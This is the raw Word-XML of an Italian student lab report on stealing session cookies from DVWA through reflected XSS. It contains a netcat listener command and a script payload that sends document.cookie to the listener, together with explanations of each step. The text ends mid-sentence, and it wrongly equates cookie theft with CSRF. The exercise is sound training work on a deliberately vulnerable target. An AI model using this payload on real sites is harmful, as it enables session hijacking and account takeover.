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1B9" w:rsidRPr="00CB6966" w:rsidRDefault="00C71285" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C71285">
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidR="002D51B9" w:rsidRPr="00CB6966">
        <w:t>S6/L5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="00C877AE" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">Traccia: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">Lo scopo dell'esercizio è quello di usare l’attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve"> per rubare i cookie di sessione alla macchina DVWA, tramite uno script. Dobbiamo creare una situazione in cui abbiamo una macchina vittima (DVWA), che cliccherà sul link malevolo (XSS), e una macchina che riceve i cookie, nel nostro caso creiamo una sessione aperta con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">. Potete usare qualsiasi combinazione, solo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve"> o altro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">Inoltre si deve: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t>● Spiegare come si comprende che un sito è vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRPr="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">● Portare l’attacco XSS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D51B9">
        <w:t xml:space="preserve">● Fare un report su come avviene l’attacco con tanto di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>screenshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D51B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRDefault="002D51B9" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D51B9" w:rsidRDefault="00267A41" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Per prima cosa andiamo sul sito DVWA tramite l’IP di metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="009B0B88">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve">, ed impostiamo il </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">livello di sicurezza a </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>low</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6870" w:rsidRDefault="00267A41" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Importante ricordare </w:t>
      </w:r>
      <w:r w:rsidR="00EB2D1A">
        <w:t xml:space="preserve">di verificare se si tratta di un sito vulnerabile o meno, </w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t>ovvero se inserendo un codice</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t>, esso</w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t xml:space="preserve"> lo esegue</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve"> o meno. Se viene eseguito </w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t xml:space="preserve">vuol dire che </w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve">il sito è </w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t>vulnerabile</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267A41" w:rsidRDefault="005D6870" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t xml:space="preserve">roviamo a fare un esempio </w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve">pratico </w:t>
      </w:r>
      <w:r w:rsidR="00784C91">
        <w:t>inserendo un semplice codice di &lt;i&gt; + testo, come output ci dovrà dare la keywords in corsivo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00784C91" w:rsidRDefault="00784C91" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6116320" cy="1481470"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="14813352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35264" name="Immagine 14813352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86"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6116320" cy="148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C16" w:rsidRDefault="003F2C16" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB2D1A" w:rsidRDefault="00784C91" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ciò vuol dire che ha eseguito il codice</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">può accettare tutto quello che </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52">
        <w:t xml:space="preserve">si </w:t>
      </w:r>
      <w:r>
        <w:t>inseris</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52">
        <w:t>ce</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t xml:space="preserve"> e di conseguenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> può eseguire degli script malevoli</w:t>
      </w:r>
      <w:r w:rsidR="00204626">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per cui posso usare il sito web vulnerabile come vettore di attacco, ciò avviene perché il programmatore del sito non ha sanato l’input dell’utente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00784C91" w:rsidRDefault="00784C91" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0B22" w:rsidRDefault="00784C91" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una volta verificato ciò</w:t>
      </w:r>
      <w:r w:rsidR="00F3408E">
        <w:t xml:space="preserve">, andiamo su XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F3408E">
        <w:t>reflecte</w:t>
      </w:r>
      <w:r w:rsidR="007C0B22">
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C0B22">
        <w:t xml:space="preserve">. Questo termine si riferisce ad una forma di attacco </w:t>
      </w:r>
      <w:r w:rsidR="009B0B88">
        <w:t xml:space="preserve">Cross Site Scripting </w:t>
      </w:r>
      <w:r w:rsidR="007C0B22">
        <w:t>riflesso</w:t>
      </w:r>
      <w:r w:rsidR="009B0B88">
        <w:t xml:space="preserve">, ed avviene quando si inserisce uno script/codice malevolo nel campo di input della pagina web vulnerabile, il cui sito </w:t>
      </w:r>
      <w:r w:rsidR="003C552B">
        <w:t xml:space="preserve">prende l’input e lo “riflette” nella pagina senza una verifica. </w:t>
      </w:r>
      <w:r w:rsidR="009B0B88">
        <w:t>Il codice verrà poi eseguito dal browser degli utenti</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>, una volta che</w:t>
      </w:r>
      <w:r w:rsidR="00CB6966">
        <w:t xml:space="preserve"> cliccano sul </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>relativo link.</w:t>
      </w:r>
      <w:r w:rsidR="00CB6966">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00CB6966">
        <w:t>ella maggior parte dei casi</w:t>
      </w:r>
      <w:r w:rsidR="003C552B">
        <w:t xml:space="preserve"> risulta molto difficile per la vittima rendersi conto dell’attacco in corso. L’obiettivo dell’attacco può riguardare il furto di informazioni sensibili, monitoraggio delle attività dell’utente o un reindirizzamento a pagine malevole.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0B22" w:rsidRDefault="007C0B22" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00204626" w:rsidRDefault="00F3408E" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In contemporanea apriamo un terminale su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e inseriamo il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3408E" w:rsidRDefault="00F3408E" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l -p + porta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204626" w:rsidRPr="00204626" w:rsidRDefault="00204626" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/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</w:pPr>
      <w:r>
        <w:t>Ciò configu</w:t>
      </w:r>
      <w:r w:rsidR="003C552B">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>erà “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00F3408E" w:rsidRPr="00F3408E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per ascoltare su una porta specifica e accettare connessioni in ingresso su quella porta</w:t>
      </w:r>
      <w:r w:rsidR="00F3408E" w:rsidRPr="00204626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, in questo specifico caso</w:t>
      </w:r>
      <w:r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, si metterà in ascolto sulla porta 12345</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D15E52" w:rsidRDefault="00D15E52" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00784C91" w:rsidRDefault="00D15E52" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successivamente, </w:t>
      </w:r>
      <w:r w:rsidR="00F3408E">
        <w:t xml:space="preserve">torniamo su la DVWA in XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F3408E">
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F3408E">
        <w:t>, ed inseriamo il seguente script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C877AE" w:rsidRDefault="00EB2D1A" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB2D1A">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB2D1A">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB2D1A">
        <w:t xml:space="preserve">='http://127.0.0.1:12345/?cookie=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB2D1A">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB2D1A">
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204626" w:rsidRDefault="00204626" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dove </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rappresenta l’URL della pagina, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inserito è </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di destinazione comprensivo di indirizzo IP + porta</w:t>
      </w:r>
      <w:r w:rsidR="00640BF5">
        <w:t xml:space="preserve">. Il parametro cookie indica che </w:t>
      </w:r>
      <w:r w:rsidR="00C877AE">
        <w:t xml:space="preserve">si </w:t>
      </w:r>
      <w:r w:rsidR="00640BF5">
        <w:t xml:space="preserve">vuole inviare i dati dei cookie alla pagina di destinazione, ed infine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00640BF5">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00640BF5">
        <w:t xml:space="preserve"> ci restituisce tutti i cookie associati alla pagina corrente come una stringa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640BF5" w:rsidRDefault="00640BF5" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00640BF5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Quindi, l’effetto di questo script è quello di reindirizzare il browser verso l’URL specificato includendo i dati dei cookie della pagina corrente</w:t>
      </w:r>
      <w:r w:rsidR="00C877AE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. Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00640BF5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uesto potrebbe essere utilizzato per eseguire un attacco </w:t>
      </w:r>
      <w:r w:rsidR="00C877AE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Cross Site Scripting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C877AE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Reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C877AE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 s</w:t>
      </w:r>
      <w:r w:rsidRPr="00640BF5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e </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52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lo script</w:t>
      </w:r>
      <w:r w:rsidRPr="00640BF5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 iniettato </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52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è </w:t>
      </w:r>
      <w:r w:rsidRPr="00640BF5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malevolo </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52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ed il sito web è vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640BF5" w:rsidRDefault="00640BF5" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/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Perché sono </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52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importanti</w:t>
      </w:r>
      <w:r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 i cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52"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 xml:space="preserve"> in questo tipo di attacco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640BF5" w:rsidRPr="003C552B" w:rsidRDefault="00640BF5" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Un cookie è</w:t>
      </w:r>
      <w:r w:rsidR="00367D83" w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> un file </w:t>
      </w:r>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>che un server web invia al browser dell'utente quando si visita un sito web</w:t>
      </w:r>
      <w:r w:rsidR="00367D83" w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, viene </w:t>
      </w:r>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>memorizzato sul dispositivo</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e utilizzato per conservare informazioni che possono essere recuperate dal server web quando l'utente visita nuovamente il sito</w:t>
      </w:r>
      <w:r w:rsidR="00C877AE" w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640BF5" w:rsidRDefault="00C877AE" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Sono molto importanti in un tipo in un attacco XSS poichè contengono informazioni sensibili relative all’utente e alla sessione. Per cui questo tipo di attacco permette all’attaccante di accedere a dati riservati o </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C552B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>seguire azioni a nome dell’utente (per esempio un attaccante ottenendo il cookie dell’utente può impersonare l’utente legittimo e accedere a dati protetti, può inoltre dirottare la sessione dell’utente assumendo il controllo dell’account</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C552B" w:rsidRDefault="003C552B" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C552B" w:rsidRDefault="003C552B" w:rsidP="00D15E5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Una volta inserito lo script, in contemporanea nel nostro terminale </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> avremmo il seguente risultato:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C552B" w:rsidRDefault="003C552B" w:rsidP="00D15E5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6116320" cy="2701290"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="129910083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0837" name="Immagine 1299100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2B" w:rsidRDefault="003C552B" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRDefault="003C552B" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>L'output fornito è una richiesta HTTP con metodo GET</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52" w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> inviata a un server in ascolto sulla porta 12345, seguita da una stringa di query che include informazioni sui cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D15E52" w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">; per cui in relazione al nostro attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D15E52" w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D15E52" w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">può essere </w:t>
      </w:r>
      <w:r w:rsidR="00D15E52" w:rsidRPr="00D15E52">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>utilizzata per ottenere informazioni relative ai cookie</w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">e alla </w:t>
      </w:r>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sessione d</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ell’</w:t>
      </w:r>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">utente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6966" w:rsidRDefault="005D6870" w:rsidP="00D15E5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Quando però, </w:t>
      </w:r>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">un attacco prevede il “rubare i cookie” allora è più corretto parlare di Cross-Site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB6966" w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
